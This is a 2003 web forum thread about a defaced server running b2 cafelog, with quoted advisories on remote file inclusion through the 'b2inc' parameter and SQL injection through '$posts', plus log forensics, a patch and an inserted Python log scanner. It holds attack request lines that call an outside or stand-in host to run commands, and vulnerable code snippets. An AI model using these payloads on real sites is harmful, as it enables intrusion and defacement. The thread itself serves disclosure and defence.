dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Sun Jun 01, 2003 9:16 pm Post subject: Vulnerabilities?
My server was just hacked big time and I'm working on getting things back to normal. All our sites were defaced and I wanted to know if anyone knows anything about this? I found the team that defaced our sites, found this website:
http://zone-h.org/en/advisories
that has a list of hackers and all sites that teams defaced... it was posted yesterday...

b2 cafelog Execution of Arbitrary Code
05/31/2003
A vulnerability has been identified in b2 cafelog allowing malicious people to execute arbitrary PHP code on the web server. The problem is that the "b2inc" parameter isn't verified in the "blogger-2-b2.php" script. By requesting "blogger-2-b2.php?b2inc=http://[evil_server]", it is possible to include a malicious "b2functions.php" and "b2vars.php" PHP script from "http://[evil_server]". A similar issue exists in "gm-2-b2.php" in the "b2inc" parameter. This has been reported in version 0.6.1.
Solution: Edit the source code to verify input or restrict access to the scripts using .htaccess or similar.
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Candle
Joined: 23 Dec 2002 Posts: 547
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Mon Jun 02, 2003 12:10 am
Thanks Candle, been out of the forums here for a long friggin time and was flippin out when our server was hacked. I deleted all those files. Thanks.
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Candle
Joined: 23 Dec 2002 Posts: 547
Posted: Mon Jun 02, 2003 1:36 am Post subject: ,,,,
Hey no problem, I just wonder how many out there don't know about it?
Sorry about your site, hope you had backups so you can get it all going again.
_________________
My Game Forum
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Mon Jun 02, 2003 2:11 am
Yep, we're recovering from it now and got most of it back up. It was TechTeam and they defaced all the homepages. I'm trying to find out if they used b2 or something else to get root access, so I've been looking for vulnerable files of ours... fun Sunday activity, damn hackers....
I used to 'live' in this forum, so I need some catching up. Hope all is well in b2 land.
_________________
Goombalooza! | Last X posts from Y Category | Login Box
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Mon Jun 02, 2003 3:43 am
I highly, highly recommend everyone fix their b2 with what was posted above (the link)... I have found that the hacker got in through my b2 weblog to all the sites.... very little damage though, mainly defacing, which is childish and lame, but at least nothing awful... thank god for backups!! All is well, so it proves our hosting isn't bad.. just my lack of keeping up with fixes for my personal stuff.
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Mister44

Joined: 31 Oct 2002 Posts: 237 Location: Philadelphia, PA, USA
Posted: Mon Jun 02, 2003 5:58 pm
How did you confirm that was the penetration vector?
TS.
Joined: 25 Jan 2002 Posts: 11 Location: London
Posted: Mon Jun 02, 2003 8:09 pm
The best way would be to look at your webserver logs looking for hits on blogger-2-b2.php & gm-2-b2.php, then as the advisory says you'll see
blogger-2-b2.php?b2inc=http://[evil_server]
Here's hoping your blog is secured.
TS.
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Mon Jun 02, 2003 11:26 pm
I was going through my access logs (and the person tried to delete them), but I saw they had created a file called mad.php in my b2-tools directory, where those 2 files from the advisory are located. I'm still trying to track down the query that started it all, but I was like "crap" knowing it was my fault. I deleted all instances of those 2 files from my blog and all the other b2 ones I have. Kinda sucked but it was taken care of. All references point to Brazil. Just annoying that it's a kiddie thing. I wouldn't mind someone leaving a .poop file somewhere and explaining what is vulnerable, you know?
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Mister44

Joined: 31 Oct 2002 Posts: 237 Location: Philadelphia, PA, USA
Posted: Tue Jun 03, 2003 12:32 am
Code:
200.158.210.243 - - [01/Jun/2003:12:44:59 -0400] "GET /b2-tools/gm-2-b2.php?b2inc=http://www.madsk8er.hpg.com.br&cmd=uname%20-a HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Look familiar? It's curious that they'd be able to deface your sites but not delete the httpd access logs... Ah well. Best of luck on the restoration.
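The log search TS. describes and the line Mister44 posted, turned into a small scanner as an added example (not code from this thread or from b2): it parses Apache combined-format lines, flags any request whose b2inc parameter carries a URL, and uses the status code to separate probes that hit nothing (a 404, as in Mister44's line) from requests the server actually executed. The sample lines, IPs and hostnames are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, the layout of the line Mister44 posted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) '
)

def remote_include_hits(lines):
    """Return one finding per request whose b2inc parameter points at a URL.

    With register_globals on, any b2 script that includes b2functions.php or
    b2menutop.php honours ?b2inc=..., so the parameter is checked on every
    request rather than only on the two scripts the zone-h advisory names.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        params = parse_qs(parts.query, keep_blank_values=True)  # %-decodes values
        b2inc = params.get("b2inc", [""])[0]
        if "://" not in b2inc:
            continue  # no b2inc, or a local value: not a remote-include attempt
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "script": parts.path.rsplit("/", 1)[-1],
            "include_host": urlsplit(b2inc).hostname,
            "cmd": params.get("cmd", [None])[0],
            "status": status,
            # 2xx means the script ran and the include may have succeeded;
            # 404/403 means nothing was executed, only probed.
            "verdict": "investigate" if 200 <= status < 300 else "blocked-or-missing",
        })
    return findings

# Constructed sample lines (documentation IPs and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2003:12:44:59 -0400] "GET /b2-tools/gm-2-b2.php?b2inc=http://evil.example&cmd=uname%20-a HTTP/1.1" 404 226 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [01/Jun/2003:12:45:03 -0400] "GET /blog/b2-tools/blogger-2-b2.php?b2inc=http%3A%2F%2Fevil.example HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [01/Jun/2003:12:46:10 -0400] "GET /blog/index.php?b2inc=http://evil.example/inc&cmd=id HTTP/1.1" 200 9876 "-" "curl/7.10"',
    '198.51.100.5 - - [01/Jun/2003:12:47:00 -0400] "GET /blog/index.php?posts=5 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in remote_include_hits(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} <- {f['include_host']} "
              f"cmd={f['cmd']} status={f['status']} {f['verdict']}")
```

Run it against a real access_log with `remote_include_hits(open(path))`; a 2xx finding is the one to chase through the filesystem, as dtdgoomba did with mad.php.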
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Tue Jun 03, 2003 1:56 am
Definitely somewhat familiar. I was looking for that actual piece in my logs, but they must have destroyed the pieces before that, and then did mad.php, but that's pretty much the same thing. They also spelled their access_log as acess_log so... but yet, we're shifting drives and zeroing out the compromised drive tonight, but we restored all files from backup. What a pain.. So wait, were you hit as well, or was it just that someone tried to attack you that way and it's present? I'm guessing the latter...
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Mister44

Joined: 31 Oct 2002 Posts: 237 Location: Philadelphia, PA, USA
Posted: Tue Jun 03, 2003 2:17 am
Notice the 404?
The files never existed in my primary journal (or any of the sites I host), and the folder that contains them in the DevBlog has a .htaccess file that forces them to be treated as plain text.
The script kiddies seem to have done a Google search for b2 installs and just fed the results to an attack script.
dtdgoomba
Joined: 05 Aug 2002 Posts: 179 Location: Cambridge, MA
Posted: Tue Jun 03, 2003 4:24 am
Ah, I see, I skimmed when I first went through. Yeah, I guess I learned my lesson about updating things, huh? Glad to see those kiddies know how to get their kicks..
_________________
Goombalooza! | Last X posts from Y Category | Login Box
Mister44

Joined: 31 Oct 2002 Posts: 237 Location: Philadelphia, PA, USA
Posted: Tue Jun 03, 2003 5:18 am
Everyone gets hacked eventually. Consider it a painful but necessary rite of passage...
cjc
Joined: 24 Dec 2002 Posts: 146 Location: New York
Posted: Tue Jun 03, 2003 11:59 pm Post subject: Out of the woodwork
More vulnerabilities, related to the one that we've already seen. This was reported on bugtraq just recently.
Quote:
Products: b2 cafelog 0.6.1 with ljupdate
b2 cafelog 0.6.2 and prior
Author: FraMe ( frame at kernelpanik.org )
URL: http://www.kernelpanik.org

CONTENTS
1. Overview
2. Description
3. Details
4. Vendor Response

1. Overview
b2 is a news/weblog tool written in PHP. b2 uses MySQL as backend system.

2. Description
"b2 0.6.1 with ljupdate" allows remote command execution in ./b2-include/b2functions.php. A malicious user can inject a URL in $b2inc and obtain command execution with web server privileges (usually nobody).
"b2 0.6.2 and prior" allows SQL injection in ./blog.header.php. $posts isn't converted to an integer, so we can inject SQL through this variable. In MySQL 4.x UNION and subselects can be used to obtain privileges.
"b2 0.6.2 and prior" has a little flaw. Bored users can force the server to read a remote file using $b2inc in ./b2-include/b2menutop.php.

3. Details
b2 0.6.1 with ljupdate.
from ./b2-include/b2functions.php:
=======================
<?php
(..)
require_once($b2inc."/lj_update.php");
?>
=======================
b2 0.6.2 and prior
from ./blog.header.php:
=======================
<?php
(..)
if ($posts)
    $posts_per_page=$posts;
(..)
$limits = ' LIMIT '.$posts_per_page;
(..)
$request = " SELECT $distinct * FROM $tableposts WHERE 1=1".$where." ORDER BY post_$orderby $limits";
(..)
$result = mysql_query($request);
?>
=======================
b2 0.6.2 and prior
from ./b2-include/b2menutop.php:
=======================
<?php
(..)
$menu = file($b2inc."/b2menutop.txt");
(..)
?>
=======================

4. Vendor Response
20-04-2003: Sent email to vendor.
31-05-2003: No response.
==============================
[ FraMe - frame at kernelpanik.org ]
[ URL - http://frame.lifefromthenet.com ]
[ Kernelpanik - http://www.kernelpanik.org ]
[ PGP KeyID - 0xFA81AC9C ]
==============================
The second one in blog.header.php can be fixed by replacing:
Code:
if ($posts)
    $posts_per_page=$posts;
with:
Code:
if ($posts && is_numeric($posts))
    $posts_per_page=$posts;
The other two shouldn't be a concern if register_globals is turned off.
Should this whole thread be shifted over to the general announcements, just so people are aware to do upgrades/code changes?